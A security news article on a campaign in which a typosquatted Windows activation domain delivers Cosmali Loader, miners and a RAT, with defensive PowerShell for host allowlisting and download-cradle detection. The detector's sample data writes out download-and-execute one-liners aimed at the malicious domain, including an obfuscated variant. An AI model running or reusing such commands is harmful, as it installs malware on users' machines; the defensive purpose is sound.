Windows users are facing a new malware campaign in which attackers abuse a fake Microsoft Activation Scripts (MAS) domain to deliver the Cosmali Loader malware. A single-character typo in a PowerShell activation command is enough to trigger the download and execution of malicious scripts, leading to the installation of cryptominers and remote access trojans (RATs) on compromised systems.
How a Fake MAS Domain Turned a Typo into a Malware Infection
The incident first gained attention on Reddit, where users reported unusual pop‑up messages and persistent PowerShell activity on their machines. Investigation traced these events to a typo in the Windows activation command: instead of reaching the project's legitimate host, the mistyped command contacted a look‑alike domain, get.activate[.]win.
The domain is a typosquat, a domain registered to resemble a popular service closely enough that users' spelling mistakes deliver traffic to it. Here the fake domain served malicious PowerShell scripts in place of the open-source activation scripts users expected.
Microsoft Activation Scripts (MAS), also known as Massgrave, is a widely known set of open‑source PowerShell scripts used to automate activation of Windows and Office (including HWID activation and KMS emulation). The project is distributed via GitHub and has an active community, which creates a perception of trust. Threat actors leveraged this trust by cloning the look and feel of the legitimate infrastructure while silently swapping in malware.
Cosmali Loader: Malware Delivery through PowerShell
Security researcher RussianPanda linked the observed pop‑ups and anomalous PowerShell behavior to Cosmali Loader, an open-source malware loader previously analyzed by G DATA researcher Karsten Hahn. Once executed, the loader is capable of fetching and launching additional payloads on the victim’s system.
In earlier campaigns and in this incident, Cosmali Loader has been observed deploying:
• Cryptominers that hijack CPU and GPU resources to mine cryptocurrency for attackers, degrading system performance and increasing power consumption.
• The XWorm remote access trojan (RAT), which grants attackers remote control over the infected host, enabling command execution, data theft, lateral movement, and the installation of further malware.
An unusual detail in this campaign is the appearance of pop‑up notifications on some infected machines that explicitly mention Cosmali Loader, explain that the infection resulted from a mistyped activation domain, and advise users to reinstall Windows and check Task Manager for suspicious PowerShell processes. According to the researchers' assessment, these messages were likely not created by the original threat actor but by an unknown third party who gained access to the Cosmali Loader command-and-control (C2) panel and attempted to warn victims.
Typosquatting on Windows Activation Commands as an Attack Vector
The use of the get.activate[.]win domain is a textbook typosquatting attack. To PowerShell or a browser, a hostname that differs by a single character is simply a different resource, and whatever the attacker's server returns for it is what the client receives. Because the installation one-liner pipes the downloaded content straight into Invoke-Expression, the malicious script runs in the caller's session the moment the download completes, with no prompt that might alert the user.
Users are particularly vulnerable when they:
• Run PowerShell commands with elevated privileges (Run as Administrator);
• Copy activation commands from unofficial sources such as forums, comments, or third‑party websites;
• Do not check the exact spelling of the domain name, or the source repository, before running a script. A valid HTTPS certificate is no protection here: the attacker obtains a perfectly valid certificate for the look‑alike domain they own, so only the hostname itself distinguishes it from the real one.
The Massgrave community has already issued a public warning about get.activate[.]win, urging users to double‑check the spelling of commands and to rely only on the project’s official GitHub repository and documented URLs.
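The following is an added example, not code from the article or from the MAS project. It replaces the "fetch a remote script and pipe it into Invoke-Expression" pattern with a fetch-verify-run wrapper: the host must match an explicit allowlist exactly, the script is written to disk and its SHA-256 compared with a pinned value, and only then is it run. A host that is an edit or two away from a trusted one is called out as a probable typosquat. The trusted host and the expected hash are assumptions the reader replaces with the values documented in the project's own repository; the page itself does not name the legitimate host.

```powershell
# Added example, not code from the article or from the MAS project: a
# fetch-verify-run wrapper to use in place of "irm <url> | iex".
# Assumptions: the trusted-host list and the expected SHA-256 are values the
# reader takes from the project's own repository, not from this page.

function Get-EditDistance {
    # Levenshtein distance, used to label a rejected host as a probable
    # typosquat of a trusted host rather than an unrelated one.
    param([string] $A, [string] $B)
    $A = $A.ToLowerInvariant(); $B = $B.ToLowerInvariant()
    $prev = @(0..$B.Length)
    for ($i = 1; $i -le $A.Length; $i++) {
        $cur = @($i) + @(@(0) * $B.Length)
        for ($j = 1; $j -le $B.Length; $j++) {
            $cost = if ($A[$i - 1] -eq $B[$j - 1]) { 0 } else { 1 }
            $cur[$j] = [Math]::Min([Math]::Min($cur[$j - 1] + 1, $prev[$j] + 1), $prev[$j - 1] + $cost)
        }
        $prev = $cur
    }
    return $prev[$B.Length]
}

function Invoke-VerifiedScript {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string]   $Url,
        [Parameter(Mandatory)] [string[]] $TrustedHosts,
        [Parameter(Mandatory)] [string]   $ExpectedSha256,
        [switch] $Execute
    )
    $uri = [System.Uri] $Url
    if ($uri.Scheme -ne 'https') { throw "Refusing non-HTTPS URL: $Url" }

    # Exact, case-insensitive host match. A valid certificate proves nothing
    # here: the attacker holds a valid one for the look-alike domain as well.
    $wanted     = @($TrustedHosts | ForEach-Object { $_.ToLowerInvariant() })
    $actualHost = $uri.Host.ToLowerInvariant()
    if ($wanted -notcontains $actualHost) {
        $nearest = $null; $best = [int]::MaxValue
        foreach ($h in $wanted) {
            $d = Get-EditDistance $h $actualHost
            if ($d -lt $best) { $best = $d; $nearest = $h }
        }
        if ($best -le 2) {
            throw "'$actualHost' is $best edit(s) away from trusted host '$nearest': probable typosquat, not fetching."
        }
        throw "'$actualHost' is not a trusted host ($($wanted -join ', '))."
    }

    # Download to a file rather than straight into iex, so the content can be
    # hashed (and read) before anything executes.
    $path = Join-Path ([System.IO.Path]::GetTempPath()) ("verified_" + [guid]::NewGuid().ToString('N') + ".ps1")
    Invoke-WebRequest -Uri $uri -OutFile $path -UseBasicParsing

    # String -ne is case-insensitive in PowerShell, so hex case does not matter.
    $actual = (Get-FileHash -Path $path -Algorithm SHA256).Hash
    if ($actual -ne $ExpectedSha256) {
        Remove-Item -Path $path -Force
        throw "SHA-256 mismatch for $Url (expected $ExpectedSha256, got $actual); file deleted."
    }

    if ($Execute) { & $path }   # runs only after the host and hash checks passed
    return $path
}

# Constructed, offline demonstration: the look-alike host from the article is
# rejected before any request is made. The trusted host below is an assumption
# taken from the project's public documentation; confirm it against the
# repository before relying on it.
try {
    Invoke-VerifiedScript -Url 'https://get.activate.win' `
        -TrustedHosts @('get.activated.win') `
        -ExpectedSha256 ('0' * 64)
} catch {
    Write-Warning $_.Exception.Message
}
```

The demonstration at the end never touches the network: the mistyped host is one edit away from the trusted one, so the wrapper refuses it as a probable typosquat. For real use, pin the hash of the script revision you have actually read, and re-pin deliberately when the project publishes a new one; a hash mismatch is the signal to stop and look, not to update the pin.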
Security Risks of Unofficial Windows Activation Tools
From Microsoft’s standpoint, MAS and similar projects are unauthorized activation tools, as they enable Windows and Office activation without a valid license by emulating KMS or exploiting other activation mechanisms. While such tools remain accessible on platforms like GitHub, the broader Microsoft ecosystem has been steadily tightening controls around unlicensed KMS activation.
This creates a dual risk for end users and organizations. Beyond violating license agreements, users are forced to trust scripts, binaries, and domains outside of Microsoft’s security and support perimeter. This significantly lowers the barrier for attackers to conduct supply chain attacks against these unofficial ecosystems, as demonstrated by the Cosmali Loader campaign.
How to Protect Windows Systems from Cosmali Loader and Similar Threats
1. Avoid unofficial activation tools. The most effective defense is to use legitimate Windows and Office licenses and rely solely on official activation mechanisms.
2. Verify domains and script sources. If third‑party tools must be used, download them only from verified sources (original GitHub repositories, official developer sites), and carefully check URLs and domain spelling before execution.
3. Harden PowerShell usage. In corporate environments, apply Constrained Language Mode, AppLocker, or similar application control technologies to restrict unsigned or untrusted PowerShell scripts, especially when run with administrative privileges.
4. Monitor PowerShell and endpoint activity. Enable PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and Module Logging, collect the logs centrally, and use EDR/XDR solutions to flag download cradles, such as Invoke-RestMethod or Invoke-WebRequest output piped into Invoke-Expression, which are typical of loaders like Cosmali Loader.
5. Maintain up‑to‑date security controls. Regular Windows updates, reputable endpoint protection, and network-based monitoring significantly increase the chance of blocking malicious scripts at an early stage.
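As an added example of steps 3 and 4 above (not code from the article or from the MAS project), the block below turns on Script Block Logging through the same registry value Group Policy sets, then scans script block text for download cradles: a remote-fetch primitive and an execution sink in the same block. It includes a function that reads live 4104 events, and a constructed set of sample script blocks, labelled as such, so the detection logic can be exercised on a machine with no events of its own. The regexes and the sample texts are this example's own assumptions, not signatures published by any vendor.

```powershell
# Added example, not code from the article or from the MAS project: turn on
# Script Block Logging and scan 4104 events for download cradles, the pattern
# a mistyped activation one-liner produces. The sample script blocks at the
# end are constructed for this example and are not real log data.

function Enable-ScriptBlockLogging {
    # Same registry value Group Policy sets; needs an elevated session.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord
}

# Remote-fetch primitives and execution sinks that make up a download cradle
# (assumed patterns for this example; tune to your environment).
$script:FetchPattern = '(?i)\b(irm|iwr|curl|wget|Invoke-RestMethod|Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient|HttpClient)\b'
$script:ExecPattern  = '(?i)\b(iex|Invoke-Expression|Start-Process)\b|&\s*[(\$]|\[ScriptBlock\]::Create'

function Test-DownloadCradle {
    # Returns $null for benign text, otherwise an object describing the hit.
    param([Parameter(Mandatory)] [string] $ScriptText, [string] $Source = 'unknown')
    $fetch = @([regex]::Matches($ScriptText, $script:FetchPattern) | ForEach-Object { $_.Value } | Select-Object -Unique)
    $exec  = @([regex]::Matches($ScriptText, $script:ExecPattern)  | ForEach-Object { $_.Value } | Select-Object -Unique)
    if ($fetch.Count -eq 0 -or $exec.Count -eq 0) { return $null }
    # Hostnames in the block, so a triage analyst sees the contacted domain at once.
    $hosts = @([regex]::Matches($ScriptText, '(?i)https?://([^/\s''"`)]+)') | ForEach-Object { $_.Groups[1].Value } | Select-Object -Unique)
    [pscustomobject]@{
        Source = $Source
        Fetch  = $fetch -join ','
        Exec   = $exec  -join ','
        Hosts  = $hosts -join ','
        Text   = $ScriptText.Substring(0, [Math]::Min(100, $ScriptText.Length))
    }
}

function Get-SuspiciousScriptBlocks {
    # Live use on a host with logging enabled: ScriptBlockText is Properties[2]
    # of a 4104 event.
    param([int] $MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents |
        ForEach-Object { Test-DownloadCradle -ScriptText $_.Properties[2].Value -Source "RecordId $($_.RecordId)" } |
        Where-Object { $_ }
}

# Constructed samples: a benign admin command, the look-alike one-liner from the
# article, and an obfuscated variant in which neither "irm" nor "iex" appears.
$samples = @(
    'Get-Service -Name WinRM | Restart-Service',
    'irm https://get.activate.win | iex',
    '$c = New-Object Net.WebClient; & ([ScriptBlock]::Create($c.DownloadString(''https://get.activate.win/loader'')))'
)
$n = 0
$hits = foreach ($s in $samples) { $n++; Test-DownloadCradle -ScriptText $s -Source "sample$n" }
$hits | Format-Table Source, Fetch, Exec, Hosts -AutoSize
```

Only the second and third samples are reported; the first has no fetch primitive and is dropped. For live use run Enable-ScriptBlockLogging from an elevated session, then call Get-SuspiciousScriptBlocks after some activity has been logged. The rule is deliberately loose (any fetch plus any execution sink in one block) because loaders vary the exact cmdlets and aliases; the cost is some noise from legitimate installers, which is why the output carries the contacted hostnames for quick triage against an allowlist.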
The Cosmali Loader campaign built around a fake Microsoft Activation Scripts domain demonstrates how a simple typo in a command line can escalate into full system compromise. Verifying command sources, avoiding pirated activation schemes, and enforcing basic cyber hygiene are critical steps for both home users and administrators to prevent similar incidents and strengthen the overall security posture of Windows environments.